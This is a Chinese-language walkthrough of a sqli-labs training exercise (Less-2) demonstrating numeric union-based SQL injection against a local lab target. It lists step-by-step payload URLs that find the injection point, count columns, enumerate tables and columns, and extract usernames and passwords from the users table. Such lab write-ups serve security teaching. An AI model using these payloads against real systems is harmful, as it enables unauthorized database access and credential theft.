SQL注入-基于联合查询的数字型GET注入

实验工具：
phpstudy ， sqli-labs靶场，hackbar 火狐浏览器
1，使用攻击机打开火狐浏览器访问靶场网站sqli-labs,进入less-2,打开hackbar进行参数调整
、

2，寻找注入点
http://靶机ip/sqli-labs/less-2/?id-1’ 运行后报错

http://靶机ip/sqli-labs/less-2/?id-1 and 1=1运行后正常显示

http://靶机ip/sqli-labs/less-2/?id=1 and 1=2 运行后未正常显示

由上述结果可以判断，网站存在数字型注入点。
3，判断网站查询的字段数
http://靶机ip/sqli-labs/less-2/?id=1 order by 1–+ 显示正常

http://靶机ip/sqli-labs/less-2/?id=1 order by 2–+ 显示正常

http://靶机ip/sqli-labs/less-2/?id=1 order by 3–+ 显示正常

http://靶机ip/sqli-labs/less-2/?id=1 order by 4–+ 报错

由上述结果可以判断，网站查询的字段数为3。
4，判断网站的回显位置
http://靶机ip/sqli-labs/less-2/?id=1 and1=2 union select 1,2,3–+ 执行结果为 2号3号位可以回显

5，获取网站当前所在数据库的库名
http://靶机ip/sqli-labs/less-2/?id=1 and1=2 union select 1,2,database()–+ 显示结果为security

6，获取数据库security的全部表名
http://靶机ip/sqli-labs/less-2/?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+
显示结果中，有一个名为users的表，这当中可能存放着网站用户信息

7,获取users表的全部字段名
http://靶机ip/sqli-labs/less-2/?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.column where table_schema=‘security’ and table_name=‘users’ - -+ 结果显示，user表中有id,username和password三个字段。

8,获取users表id,username和password字段的全部值。
http://靶机ip/sqli-labs/less-2/?id=1 and 1=2 union select 1,2,concat_ws(’,’,id,username,password)from security.users limit 0,1–+

由于users表中存放着多组用户名和密码的数据，而每次只能显示一组数据，我们可以通过通过limit M,N 的方式逐条显示 如：
http://靶机ip/sqli-labs/less-2/?id=1 and 1=2 union select 1,2,concat_ws(’,’,id,username,password)from security.users limit 1,1–+

http://靶机ip/sqli-labs/less-2/?id=1 and 1=2 union select 1,2,concat_ws(’,’,id,username,password)from security.users limit 2,1–+

… 以此类推，可通过修改limit后的参数，将users表中存放的用户信息全部暴露出来。